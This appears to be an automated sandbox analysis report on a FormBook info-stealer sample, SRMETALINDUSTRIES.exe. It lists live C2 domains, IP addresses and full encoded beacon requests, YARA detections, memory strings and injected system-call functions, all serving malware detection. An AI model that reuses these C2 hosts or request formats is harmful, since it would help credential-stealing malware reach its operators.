Source: C:\Windows\explorer.exe	Domain query: www.ifbrick.com
Source: C:\Windows\explorer.exe	Network Connect: 44.227.65.245 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nordicbatterybelt.net
Source: C:\Windows\explorer.exe	Network Connect: 185.215.4.13 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 165.73.84.33 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.advindustry.com
Source: C:\Windows\explorer.exe	Network Connect: 185.134.245.113 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.nordicbatterybelt.net/n58i/

Source: Joe Sandbox View

ASN Name: AfrihostZA AfrihostZA

Source: global traffic	HTTP traffic detected: GET /n58i/?fD=F+G31dedRh6HLTd+ecIv/qGaPc+OF0rVpdWlg5lJjBXzRtzoveZeEYo5TUAR7GVYQJUOwMAABw==&7nVT9d=P6AhC8Yh4LuLMhK0 HTTP/1.1Host: www.ifbrick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=unnhyE6s8wGaSGOfJAqqywl5AWsKat8KABC8TJyOz0JlXUzqDPtAwNp8gBEuIS9Csn5pfDFizQ== HTTP/1.1Host: www.integrity.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=M2+dNbjF68Ecx6/kG0IjEvERphPYwrhl5ASQUZVNwgXuLMQcMfVPa3ABQDdZS66N8pSyWuXUWw== HTTP/1.1Host: www.nordicbatterybelt.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n58i/?fD=PUNHIxjtOSFwkEXuacN/093UMB3LWAmrPV2Rldw+lO4ozANnbCtjpuKVlOTMjGDvzMsTPi3I2g==&7nVT9d=P6AhC8Yh4LuLMhK0 HTTP/1.1Host: www.starworks.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=IQPyE+VrRvak8LK8nAdRdA+GXS2RT8iR9v4gvsbeLz4LfgOhT+qf8KqQA9G0pMp8GxoQ9RLGrw== HTTP/1.1Host: www.sashaignatenko.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 185.134.245.113 185.134.245.113

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Sep 2021 07:44:35 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: explorer.exe, 00000005.00000000.441229219.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	String found in binary or memory: https://tilda.cc
Source: svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	String found in binary or memory: https://www.domainnameshop.com/
Source: svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	String found in binary or memory: https://www.domainnameshop.com/whois
Source: svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	String found in binary or memory: https://www.domainnameshop.com/whois?currency=SEK&lang=sv
Source: svchost.exe, 00000009.00000002.614986708.0000000003AB2000.00000004.00020000.sdmp	String found in binary or memory: https://www.domeneshop.no/whois

Source: unknown

DNS traffic detected: queries for: www.hisensor.world

Source: global traffic	HTTP traffic detected: GET /n58i/?fD=F+G31dedRh6HLTd+ecIv/qGaPc+OF0rVpdWlg5lJjBXzRtzoveZeEYo5TUAR7GVYQJUOwMAABw==&7nVT9d=P6AhC8Yh4LuLMhK0 HTTP/1.1Host: www.ifbrick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=unnhyE6s8wGaSGOfJAqqywl5AWsKat8KABC8TJyOz0JlXUzqDPtAwNp8gBEuIS9Csn5pfDFizQ== HTTP/1.1Host: www.integrity.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=M2+dNbjF68Ecx6/kG0IjEvERphPYwrhl5ASQUZVNwgXuLMQcMfVPa3ABQDdZS66N8pSyWuXUWw== HTTP/1.1Host: www.nordicbatterybelt.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n58i/?fD=PUNHIxjtOSFwkEXuacN/093UMB3LWAmrPV2Rldw+lO4ozANnbCtjpuKVlOTMjGDvzMsTPi3I2g==&7nVT9d=P6AhC8Yh4LuLMhK0 HTTP/1.1Host: www.starworks.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n58i/?7nVT9d=P6AhC8Yh4LuLMhK0&fD=IQPyE+VrRvak8LK8nAdRdA+GXS2RT8iR9v4gvsbeLz4LfgOhT+qf8KqQA9G0pMp8GxoQ9RLGrw== HTTP/1.1Host: www.sashaignatenko.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: SRMETALINDUSTRIES.exe, 00000000.00000002.356349661.0000000000B58000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large strings

Show sources

Source: SRMETALINDUSTRIES.exe, Forms/mainForm.cs	Long String: Length: 38272
Source: 0.0.SRMETALINDUSTRIES.exe.3f0000.0.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 0.2.SRMETALINDUSTRIES.exe.3f0000.0.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 4.2.SRMETALINDUSTRIES.exe.8d0000.1.unpack, Forms/mainForm.cs	Long String: Length: 38272
Source: 4.0.SRMETALINDUSTRIES.exe.8d0000.0.unpack, Forms/mainForm.cs	Long String: Length: 38272

Source: SRMETALINDUSTRIES.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.SRMETALINDUSTRIES.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.611035350.0000000000E30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.422353517.0000000000F00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.610962252.0000000000E00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.386735863.0000000007648000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.401938701.0000000007648000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.610457709.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.422322216.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.357083874.00000000037F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.421818321.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_04803198	0_2_04803198
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_0480342F	0_2_0480342F
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_04803188	0_2_04803188
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_048061B8	0_2_048061B8
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_04802EC8	0_2_04802EC8
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_04802ED8	0_2_04802ED8
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_048033EC	0_2_048033EC
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 0_2_048033F8	0_2_048033F8
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0041B8DB	4_2_0041B8DB
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0041C136	4_2_0041C136
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0041D229	4_2_0041D229
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00408C6B	4_2_00408C6B
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00408C70	4_2_00408C70
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F2B28	9_2_034F2B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F1FF1	9_2_034F1FF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0345EBB0	9_2_0345EBB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03446E30	9_2_03446E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F2EF7	9_2_034F2EF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F22AE	9_2_034F22AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F1D55	9_2_034F1D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0342F900	9_2_0342F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F2D07	9_2_034F2D07
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03420D20	9_2_03420D20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03444120	9_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343D5E0	9_2_0343D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03452581	9_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034E1002	9_2_034E1002
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343841F	9_2_0343841F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0343B090	9_2_0343B090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034520A0	9_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034F20A8	9_2_034F20A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005AB8DB	9_2_005AB8DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005AC136	9_2_005AC136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_005AD229	9_2_005AD229
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00598C70	9_2_00598C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00598C6B	9_2_00598C6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00592D90	9_2_00592D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00592D87	9_2_00592D87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00592FB0	9_2_00592FB0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: String function: 0342B150 appears 35 times

Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_004185D0 NtCreateFile,	4_2_004185D0
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00418680 NtReadFile,	4_2_00418680
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_00418700 NtClose,	4_2_00418700
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_004187B0 NtAllocateVirtualMemory,	4_2_004187B0
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_004185CA NtCreateFile,	4_2_004185CA
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_0041867C NtReadFile,	4_2_0041867C
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_004186FB NtClose,	4_2_004186FB
Source: C:\Users\user\Desktop\SRMETALINDUSTRIES.exe	Code function: 4_2_004187AC NtAllocateVirtualMemory,	4_2_004187AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469710 NtQueryInformationToken,LdrInitializeThunk,	9_2_03469710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469FE0 NtCreateMutant,LdrInitializeThunk,	9_2_03469FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469780 NtMapViewOfSection,LdrInitializeThunk,	9_2_03469780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469650 NtQueryValueKey,LdrInitializeThunk,	9_2_03469650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469A50 NtCreateFile,LdrInitializeThunk,	9_2_03469A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_03469660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034696D0 NtCreateKey,LdrInitializeThunk,	9_2_034696D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034696E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_034696E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469540 NtReadFile,LdrInitializeThunk,	9_2_03469540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03469910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034695D0 NtClose,LdrInitializeThunk,	9_2_034695D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034699A0 NtCreateSection,LdrInitializeThunk,	9_2_034699A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469840 NtDelayExecution,LdrInitializeThunk,	9_2_03469840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03469860
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469760 NtOpenProcess,	9_2_03469760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469770 NtSetInformationFile,	9_2_03469770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0346A770 NtOpenThread,	9_2_0346A770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469B00 NtSetValueKey,	9_2_03469B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0346A710 NtOpenProcessToken,	9_2_0346A710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469730 NtQueryVirtualMemory,	9_2_03469730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_034697A0 NtUnmapViewOfSection,	9_2_034697A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0346A3B0 NtGetContextThread,	9_2_0346A3B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469670 NtQueryInformationProcess,	9_2_03469670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469A00 NtProtectVirtualMemory,	9_2_03469A00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469610 NtEnumerateValueKey,	9_2_03469610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469A10 NtQuerySection,	9_2_03469A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469A20 NtResumeThread,	9_2_03469A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03469A80 NtOpenDirectoryObject,	9_2_03469A80
